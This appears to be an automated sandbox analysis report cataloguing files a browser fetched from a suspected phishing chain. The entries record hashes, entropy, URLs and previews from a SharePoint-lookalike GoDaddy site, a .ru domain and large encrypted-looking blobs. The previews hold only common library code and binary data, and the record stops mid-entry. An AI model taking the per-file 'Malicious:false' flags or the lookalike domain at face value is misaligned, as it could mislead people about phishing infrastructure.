                                      SHA1:23DDA465613667EABEF19D8E1F1E9453E3833425
                                      SHA-256:B6FFAC498B30BAA7C93376EE809A0B2349EB6548DF7B635960EA0607D67AD918
                                      SHA-512:AD9AC25E216FCD3BE1D05D4327F43712099716769553256B127C943543A178784FE77BCD5DCFEF31E2627EB3B09A6D4C44A1B4180D433F2973F284DB6442EE15
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:11
                                      Preview:..N.B..d...:.<..D,.oP.J.;......Wx..#.......)...;O>...a.=P..m.x..Gr....P0.9.).*_Z....[/xr.%.0...L....Vi..L.t5.!r.7.V..W$3..(...$."b..}.(..Y..q........c.j5........4.....2..rY:N..:..gp?.vM...TxN@.7R.F..N.e......r...........].....?.P.._>.Zi.V....5..O||.zf...Une2.vF.(t.../KO.<.K..'.RK.G..... h@.b'y.q..%E.3..F..gM.]&.....1I.v^*..ZI.2C.O..@....?.4...|\..RI"......!...+.......=...Uw.!i...W.....y.......v\\C{.Z.<.r..G.z.D..)k........F.}f...)n.7.F.-M..N.'b."..Jv...~I<.U....|..[Q_2`...J.zs=.2=s..+7h.D.a6b|.....c.......4..Q`...A...P..+.....p.......'.Z..k.brS.F~.].@..&...6k..*..!..W..`..xi...*m...w.......xE...%x.OS\..........J...t.....f...`.#.y....-_..s....t.b.Fc... ...8.Bf=.q.2.m..l.\..2.b..Yy......U..q0.t.ayX;*.6.@A..}...e.......a.b.h0_..........X-f1....)...t......go..a...'.!...P.7.......$y.$.......$.........T..:.....To...#.LL.a.^Z.....Ivq.# ......i..2.@.].*...l.+oZv.&.-l.Q.Jstyc.;|......Q,>..'..."...B/.u.6_.1dd.}.L..C`;}Ci.D:..1...{.u.:.`...
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (16679)
                                      Category:downloaded
                                      Size (bytes):48600
                                      Entropy (8bit):5.5395058049877886
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:57C787259E735B001F2C875E4CC7611E
                                      SHA1:FE5AE01377AAECA5E9840731214BAF611BAE7F35
                                      SHA-256:86B34762A8783A493D3710E6DA174617B170395148AF0DA2B8744C0071AE6A4A
                                      SHA-512:5CEBF04B31F3DCBDC1439AE003E86F98261D2A78CA85A91AB1DA4133104313B75D7DAC7663E7E62FD4923CEE0846F10FC6694F3710F6CA97BE0C4BB0DB37B31A
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://toungeassociates-sharepoint.com/
                                      Preview:<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>Tounge Associates SharePoint</title><meta name="author" content="Tounge Associates SharePoint"/><meta name="generator" content="Starfield Technologies; Go Daddy Website Builder 8.0.0000"/><link rel="manifest" href="/manifest.webmanifest"/><link rel="apple-touch-icon" sizes="57x57" href="//img1.wsimg.com/isteam/ip/4ad2b652-cff0-4027-af63-57c60235a245/TA.PNG/:/rs=w:57,h:57,m"/><link rel="apple-touch-icon" sizes="60x60" href="//img1.wsimg.com/isteam/ip/4ad2b652-cff0-4027-af63-57c60235a245/TA.PNG/:/rs=w:60,h:60,m"/><link rel="apple-touch-icon" sizes="72x72" href="//img1.wsimg.com/isteam/ip/4ad2b652-cff0-4027-af63-57c60235a245/TA.PNG/:/rs=w:72,h:72,m"/><link rel="apple-touch-icon" sizes="114x114" href="//img1.wsimg.com/isteam/ip/4ad2b652-cff0-4027-af63-57c60235a245/TA.PNG/:/rs=w:114,h:114,m"/><link re
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (771)
                                      Category:downloaded
                                      Size (bytes):776
                                      Entropy (8bit):5.106379858835968
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A38EE5FE6A261E2572C226CD95CF3CBB
                                      SHA1:E6D612DECFD9A7B20035BA224CF6DCB1FFD0CFB1
                                      SHA-256:A53E8161AE6996449FCAA1E07DF969EDA4DBAE02534AE73DF61D6C1A2A460EDE
                                      SHA-512:C127AE7687D7098409AAA4B22067B4122ABDAEB69128F9E6B599363E2EA67BB7FCB6DD14E9D8F9EDAE92D4A533944FAF2C7A0D39161BA166D38D749FC754F03B
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                      Preview:)]}'.["",["black ops new zealand trick","bobby allison bowman gray","yellowstone season 5 trailer","gma deals","atlantic tropical storms","aurora borealis forecast","san antonio spurs vs dallas mavericks","airbnb beetlejuice house"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1252,1251,1250,604,603,602,601,600],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65299)
                                      Category:dropped
                                      Size (bytes):80721
                                      Entropy (8bit):5.2050910887414075
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:2E477967E482F32E65D4EA9B2FD8E106
                                      SHA1:DDC6E9EAD6D16AE9237399CE41E8C1620CC59C36
                                      SHA-256:0833B2E9C3A26C258476C46266E6877FC75218625162E0460BE9A3A098A61C6C
                                      SHA-512:ECF8BFA2D7656DB091F8B9D6F85ECFC057120C93AE5090773B1B441DB838BD232FCEF26375EE0FA35BF8051F4675CF5A5CD50D155518F922B9D70593F161741A
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:/*!. * Bootstrap v5.3.3 (https://getbootstrap.com/). * Copyright 2011-2024 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t=new Map,e={set(e,i,n){t.has(e)||t.set(e,new Map);const s=t.get(e);s.has(i)||0===s.size?s.set(i,n):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(s.keys())[0]}.`)},get:(e,i)=>t.has(e)&&t.get(e).get(i)||null,remove(e,i){if(!t.has(e))return;const n=t.get(e);n.delete(i),0===n.size&&t.delete(e)}},i="transitionend",n=t=>(t&&window.CSS&&window.CSS.escape&&(t=t.replace(/#([^\s"#']+)/g,((t,e)=>`#${CSS.escape(e)}`))),t),s=t=>{t.dispatchEvent(new Event(i))},o=t=>!(!t||"o
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.939299725469964
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:AEBB3F5287984F3A48FEA092FB02C788
                                      SHA1:EBDB4C4270741D8398AD843C3AD1EFB57C3F44A9
                                      SHA-256:854DC853CC296E80E121DF3C6830ED9E6E4E5649B958FF1ABE997266FF812496
                                      SHA-512:4A2D24BFE0952DFD8BFF04F92BD8AE4645C197B12FB360AE06F455CDDD706EFE680D5C619C457172669D034EF7A53E2818F3A6DE3641C51DD802B04298C5554E
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:21
                                      Preview:7Yl.P.X.-.f...uF;.1y&.Ip.X7....W+.#2../....T..F..AV.I=.v.xU.........O..:(!Q....r}js....F'`...ih.......]!*...)O.-......J...5...I.E..F.)....z..r..#d.....j..n.L.#..9.B..:..#..\M...t..}.8..k. ..qA..?........c.N..b}#.N.+.......F....2.3..sU..k....p].A..U .....on5p.p.=b."U..3..\...4.../...87...(......F.f...J.....(.frL.{B=...:...".|.G.0.d........kQ.+....~..).F4.en..y+..NF.y.&<g..SWg.....~{.C...j..^.@../......%X.7..8T?[..j*...4........!g.Z...B..[.r.?.~...j..[..;y.Lq@.A.p.K..~9....<w2.>rc.xvgJ......T....\4.A.M-...za.w.h.Z........'.!.j.a.Q.^|..d......5.B...0!..H.....R(.}7.0..r...9....j....p,.y.y...z....NJ.*..J.])..-..w4...?Q&.....8..E...rf5..qYW..........>S..|y.wN:...).OT.p..\CS..]..#...Q.{*...1...+...D.l..=.u...o...:...;.w.H...M.s0.;V.....5W...d..uO'._.@\?x.[...S.D...Q.....Lo...@..s..w.Q...b...U..!...#...1..Go...j.F~@O....q<.1.o..P....Jn.N5....dG.n,bC...X.o.....S#.b.6.md........T..[y*s..3...j.........bk~.....9K.X".....B.e........w..g.'..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (8016)
                                      Category:downloaded
                                      Size (bytes):8086
                                      Entropy (8bit):5.198173409336849
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B7D4666007DAF3A649997A18B660AEC7
                                      SHA1:77F3877A18CE7C11D5EFFD5678D9B437D7B65C00
                                      SHA-256:4A2E1590E191366A21938765258D06B4B77E5D66DA13A066930FE0C7BEAABA9D
                                      SHA-512:74A782AE30AEEEB9F2AB2EA7F50FA14E8AD6C69B8E28E496C2B64C38DDBF99AB9243D50BCE575336CBB1B9380FC34511820935B2E4BAE106D3C70EF519E7688C
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/bs-layout18-Theme-publish-Theme-8c3af3d5.js
                                      Preview:define("@widget/LAYOUT/bs-layout18-Theme-publish-Theme-8c3af3d5.js",["exports","~/c/bs-_rollupPluginBabelHelpers","~/c/bs-index3","~/c/bs-legacyOverrides","~/c/bs-modernThinRound","~/c/bs-defaultSocialIconPack","~/c/bs-loaders","~/c/bs-index2","~/c/bs-index","~/c/bs-overlayTypes","~/c/bs-imageToHeaderTreatments"],(function(e,t,r,o,a,l,n,i,s,d,g){"use strict";const{colorPackCategories:h,buttons:m}=(global.Core||guac["@wsb/guac-widget-core"]).constants,{LIGHT:c,LIGHT_ALT:u,LIGHT_COLORFUL:p,DARK:b,DARK_ALT:y,DARK_COLORFUL:f,COLORFUL:S}=(global.Core||guac["@wsb/guac-widget-core"]).constants.paintJobs,H={[d.F]:"accent-overlay",[d.b]:"accent-overlay",[d.c]:"category-alt-solid",[d.B]:"accent-overlay",[d.L]:"accent-overlay",[d.W]:"category-alt-solid"},C={defaultHeaderTreatment:d.F,hasLegacy:!0,heroContentItems:["tagline","tagline2","cta"],nonHeroContentItems:["phone"],imageTreatments:H,headerTreatments:g.i(H),insetConfig:{borderStyles:{borderColor:"highContrast",borderStyle:"solid",borderWidth
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:downloaded
                                      Size (bytes):471
                                      Entropy (8bit):5.1812335913644
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:41C35B67A317A5C8D93E6ECB9EC85CF1
                                      SHA1:08EB8F4D33FC7000F0E9B5A61CDA097AF959B83E
                                      SHA-256:B184EEDEC97E06AC2BBB4C5BDC34304E6D75A129245C09742056CB4BB33A1FDC
                                      SHA-512:7916A815B89AE7F374EFFEB049EE8994660778D0A25DEA4768081140B84B877B415A9318B2B20F8302C310BF057F802999A3B63CCFCFCE6BCB76564DBFB9DD08
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://toungeassociates-sharepoint.com/manifest.webmanifest
                                      Preview:{"scope":"/","start_url":"/","display":"standalone","icons":[{"sizes":"192x192","type":"image/png","src":"//img1.wsimg.com/isteam/ip/4ad2b652-cff0-4027-af63-57c60235a245/TA.PNG/:/rs=w:192,h:192,m"},{"sizes":"512x512","type":"image/png","src":"//img1.wsimg.com/isteam/ip/4ad2b652-cff0-4027-af63-57c60235a245/TA.PNG/:/rs=w:512,h:512,m"}],"name":"Tounge Associates SharePoint","short_name":"Tounge Associates SharePoint","theme_color":"#6F6F6F","background_color":"#6F6F6F"}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (1238)
                                      Category:downloaded
                                      Size (bytes):1239
                                      Entropy (8bit):5.068464054671174
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                      SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                      SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                      SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://trendlifetechdo.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                      Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (56356)
                                      Category:dropped
                                      Size (bytes):65138
                                      Entropy (8bit):5.345558907851159
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:00FB3E67C9167335158F902C828D83DC
                                      SHA1:3E26345F28BBA867D4570E6804E20B03143977D7
                                      SHA-256:7E819DA173BF3CEF2EBA553A675F578F6B1F4472FC7B4680A86D03C4B3FA4B37
                                      SHA-512:3D8FF1C0ED21E06F4E0EEB95BA06CBBE80ED03E3E585AE64951E473E00075FA06E867F24F4EBA98B7F47E678AEE5864932BC04C771B44E6E9A847232FAC5D6E1
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:navigator&&navigator.connection&&(window.networkInfo=navigator.connection,navigator.connection.addEventListener&&navigator.connection.addEventListener("change",({target:n})=>window.networkInfo=n));.const imageObserver=new IntersectionObserver((e,r)=>{var a=e=>{if(e.hasAttribute("data-lazyimg")){var t=e.getAttribute("data-srclazy");let o=e.getAttribute("data-srcsetlazy")||"";if(t&&(e.src=t),o&&window.networkInfo){var n=window.networkInfo.downlink;const r=[{min:0,max:5,regex:/(.*?(?=, ))/,qMod:!0},{min:5,max:8,regex:/(.*2x)/}];r.forEach(({min:e,max:t,regex:r,qMod:a})=>{e<=n&&n<t&&(r=o.match(r),o=(r&&r.length?r[0]:o)+(a?"/qt=q:"+Math.round((n-e)/(t-e)*100):""))})}e.srcset=o,e.removeAttribute("sizes"),e.removeAttribute("data-lazyimg"),e.removeAttribute("data-srclazy"),e.removeAttribute("data-srcsetlazy")}};e.forEach(e=>{if(e.isIntersecting){const t=e.target;window.networkInfo&&0===window.networkInfo.downlink||([t].concat(Array.from(t.querySelectorAll("[data-lazyimg]"))).forEach(a),r.unobse
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.936582714543787
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:EA680E087A9C759B96C364F52E9796D9
                                      SHA1:2DD333F049415395E4BBEE4B75EA7946D32837B7
                                      SHA-256:2AF9AF04AA3298CC8843C8E9BB2CE07F329B2418159283D0BCDA0BE6CF37AE88
                                      SHA-512:306033ADDE007B34CC0154AA7A706A54C4A7F4EE322401659C9ECAE7F5940DE2519D4980A183D4271448686557CB67E46C3300409A5E6BE237DC82557DE2ACF6
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:10
                                      Preview:s..S....#........t+.........l.%.c.?).J+J..o..}.Q.[.O.N...\.....o^$..'.dd.`.....4.).t]...eJ..Fh.a.{...:.i..u...+i..=lI....,.Y.wk.A...,|%....3.|..\w.Q...w.T..T./N.4&.R..D.....RF..q.4.J.1Uw8..{5....E..V'.p>....(.1C.;../.%\@.l|....0.Ku...t.....q..{p~o9.wETh...8..B....i..l._....\..v..N{.X. ..X.9....g&.}.0..7...c..ud...Q....I..U.f..A.y...I,g..BwOm..)FV.NP.3..9..r..Z......../M.\."..~../.>..v0f.z3...[NT,....r.ih...IR.........vo.........`...x._o3G...m.c.S....7m..Z...@..M...@.b...+........>e.^...R#r.p..4..0.}.?..........(c^.I.._.f.V5.1....%".]F.F....1..ru.....>!... A......6X.........m\.;D+/....k.^...s.?.....]..7.r.......p?".'ei.4V....[a..s.q...S......w\.'..........X.gh.R...$K...c..je.....e.\..9.|...8.A.d..N.i. .'l..N,.I..Y..1Q....rc...t.......$Q..V.[g.G..bJ.?.\\VN.l|Y.;J......k...#.$.?..../...Ix.....Z.,S........q}....;.[..J.q.o.5t*..u..._.%N..03..l53..vXb....7.).....[.5...O..7...N/.2M..aHA=".B5..+0a...V....._I. D.T..T..,..p4{S.B..D.Z..4.......M..xnI./.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.885291524061662
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:524387C416669E7C5A9116111B7F013D
                                      SHA1:AE894AB25815BF27D801EAE3C84831FCB0F40408
                                      SHA-256:1AF78665CA9FF203662C282F1521188B05BC934E427825232E7FD459BD7EBBC5
                                      SHA-512:904D3BA3E25A12919AE822D2754FB2C50AEA58FEAA0EE1D91C263FD0C3ED97DF467A0F6F104410A2E0A7A8E41B6C8D0853B5681DD4BF349A92ADAAF57D201884
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:28
                                      Preview:;.;m.V.m.u.I)\.]....D......V........D....).7.4Fl..b{Q......E2..S........b{..u,...Y~.R.G..5.'....xo`..s....Q%2g.r"..t.g..}.6.hX.YW{D. E.@.+...JD.mE8..D+p.......X;1..m.j.{.....;.....P....{....b.L..."Q.....i6UP...._..!`.2.5BY.bp..%.#7..Kf$g.W..I[..!'p........ .Pf.N.....`.6?..4....7$ r.;.`Q1.."O......Je\-.h.p/...?..J...8.*...8..`.h.....O.R`4..X.....Q.s$..l..F..jP.~.o>....m)........k...j*7.....3._}Le/..l..\...... u.B."/.)+].P...!<.q....q.<..T.J..0((|1...t.....a......@..|H...CFXJaz..D.....0.`$.......b..s.j....F].J3.>....+.....x.aP.r@ARdH...sD.....m.|.....X..j.9.kl.....^....}?.*...4..x&.nw.g..`.[....Pu.hr.k?.f.q.4...S.t..o.x..GV.a?.H.?f..Q...../8v_I):.\6f....8g.^.f...i..@1N4.gg$.x...(...c.wa..d!.......x....]..$I,....~.x.tW.. qyC..d.......X..P._.x@...`...c&...Gb......{........X...~.....%.LH.....{.~.#ly.g... .....-S......e....l..t*2A."..~d.UN..m.d.g.IG..&...b...I]...._.S..L8i........Z..J7.I...z`.(..:.yh.$8....P{:....y...n...........A}..&.a..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):304
                                      Entropy (8bit):5.609970428503769
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:DAA79AD7558674F6A12D962ABF47F2F6
                                      SHA1:03EEA0EBEBD11EC14CFA5A651EB0ACA2604829A7
                                      SHA-256:604281887CD770ED21601933E9636A7A9C8A57A30D7D796AE7D760EEF64D5089
                                      SHA-512:B335EBCB0C982398C56D9A5F68F5D4E36A850AB139976BD94354C7CD18F1F370866A74F46FCD399F46E410D59AF7FBA890A17003BB4FD456DD43A6DE531D28F9
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:define("@widget/LAYOUT/c/bs-searchFormLocations-c86f2a99.js",["exports"],(function(o){"use strict";o.D="DESKTOP_NAV_COVER",o.M="MOBILE_NAV",o.N="NAV_DRAWER",o.S="SIDEBAR",o.a="DESKTOP_NAV"})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-searchFormLocations-c86f2a99.js.map.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (535), with CRLF line terminators
                                      Category:downloaded
                                      Size (bytes):7328
                                      Entropy (8bit):4.592422064220694
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:AE3CD895CA1AF4C6D9B2C170C621D49A
                                      SHA1:3D040D4399F020C8C30C59806F8AF92B2F9D9D99
                                      SHA-256:E3FD56FF08AA76029A23D98A579D4E392265D248CBA054D8A4975D2B06F542D7
                                      SHA-512:96D716049E596B8B768738A8D1C35AB183FD5D6088061333F2C9A231C835E678FDFBB5A7B33E9BE125F85ECC94348985AED8CB6908C549E41FC0AA30B26E21EA
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://trendlifetechdo.ru//
                                      Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Aficionados of Fine Vehicles - trendlifetechdo.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">..</head>....<body>.... <nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://trendlifetechdo.ru//#">.. <i class="fas fa-car"></i> Aficionados of Fine Vehicles </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive".. aria-controls="navbarResponsive" aria-expanded="false" aria-label="Togg
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):472316
                                      Entropy (8bit):7.936809909863702
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:D5E7745DA4156172CBD4A7BE89DF016A
                                      SHA1:7940B2C643E078029E9AA7C78B21EC5FAC6B2E78
                                      SHA-256:30E83FD0D6FDAC209927CE8C91161E512EB619E99F8CC285141B9BB502ADEEC4
                                      SHA-512:F48FFD832CCA0BACCAC4DAAE6035E33E18FCBC348255FFF242D62A20E5338516AADE7363CD09E98430643840302E3BE19AEA9EE1ED9610188B6D10F4FAB9F70A
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:2f
                                      Preview:......Q.@*s.b.$$E..:...4.8....PF.t......$...h..9.$A....M..s.....o......}..~..L*C}l.t..12<e..[.Ku....],..gt.x`..C.....%t...1'.\pF.Cv~.4.{u z..Y....h.....P(.#.y.....Q..7...{5.q..!1Zv..^(....[O..F.1.Q.\..?....j......{pm7X..ht..]E.3..XU...r'..&....X.0.]$^.4*.M.H..'...B....,..u.f9..............U ...N^..c.J10..3BUPWy.]}.}=7...z...y....0.....`.O':.+.6.._.$........"V..~gp....5F....r..=PH.>.L.o.".8O..1...8M....d......:...;..u....h.h]#KH@r*[...p..y?Hf>.....V.k)Nq....C.(.......$....pJ._............D\JB3.Y.e..ai.T79f.(J.U..fqnLV'...d.P.....[X[.SZe.X(Ht..`./..HX.......J.:.......Z.Z,.L.\AC...G....n<.iC8HY"Q.....u.....:./....F.~gk..9....% vY.......h...\.!Q%.D..Ti.....m\E.+........(.J.{....*..{.^'.>..#..d.B..Z...O)'..;.V..F.X.<j..?...l..1 N......0.d.D.8..&q.:V..o..X..Y.`.v.]..B[..&rm.0)i.xG4.....G6..a.B?>.eWsp..Q.){.U..^.".|3.......5o.| .........Cwb.h..K.W5...~..z.^..h..'.@\....Q...a..:..u....:.....).V9.*.<VM.gKV.o...+...b.L....J............S.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (52276)
                                      Category:downloaded
                                      Size (bytes):102526
                                      Entropy (8bit):4.781903903660331
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C43CD173EEEBA2F72AA6B431D06B8C07
                                      SHA1:427A692F7F39EABB3D5B8510AEE2743025DAF813
                                      SHA-256:C880EB3D25C765D399840AA204FEC22B3230310991089F14781F09A35ED80B8A
                                      SHA-512:02F6F6422B83104BC1E1B64961D7EDDA63635528417ED2DD3C6F0527457B8AB4CB43C528D2A70FC61E0F96AEC6E6D1A6D2B53ED523E1568B6D78BA41111C1393
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                      Preview:/*!. * Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):273882
                                      Entropy (8bit):5.562733141852537
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C7214ABABCA3746F269BE7EB8D0338B0
                                      SHA1:1A8B996AD89386AE58FE64F88CDCD476E5689D1F
                                      SHA-256:AB615CD5A0C9225DBBA355D1267361962CD463FA363CE5ACD99E1CD94025544C
                                      SHA-512:E250CAD470074E3F8610E0AD4478565A9A85AA5F6309A2B5E27E3FD6223D7AA60B9EA84EB4F52F0CB6B184D3B0B2AB45D6467BFDC7EE097D976F49A018D6ED9E
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-index3-be7521e8.js
                                      Preview:define("@widget/LAYOUT/c/bs-index3-be7521e8.js",["radpack","exports","~/c/bs-_rollupPluginBabelHelpers","~/c/bs-overlayTypes","~/c/bs-index2","~/c/bs-index","~/c/bs-dataAids","@wsb/guac-widget-shared@^1/lib/components/ColorSwatch","@wsb/guac-widget-shared@^1/lib/components/Carousel","~/c/bs-navigationDrawer","~/c/bs-searchFormLocations","@wsb/guac-widget-shared@^1/lib/components/DynamicFontScaler"],(function(e,t,a,r,o,l,n,i,c,s,g,p){"use strict";class u extends((global.Core||guac["@wsb/guac-widget-core"]).UX2.utils.createElement("Background")){}a._(u,"propTypes",{className:(global.PropTypes||guac["prop-types"]).string,backgroundSize:(global.PropTypes||guac["prop-types"]).string,backgroundPosition:(global.PropTypes||guac["prop-types"]).string,style:(global.PropTypes||guac["prop-types"]).object,imageData:(global.PropTypes||guac["prop-types"]).object,mobileWidthMultiplier:(global.PropTypes||guac["prop-types"]).number,desktopWidthMultiplier:(global.PropTypes||guac["prop-types"]).number,blu
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.980091677841229
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5F1CF01A3600D8C45595FF42169F151A
                                      SHA1:8E63508B055B9EB7C4EF60788F87936AE2FEF2C8
                                      SHA-256:DE4BACF37CB302E2894F36C5E72881B1424B97FF2B032A9848C2E66D37EB7F93
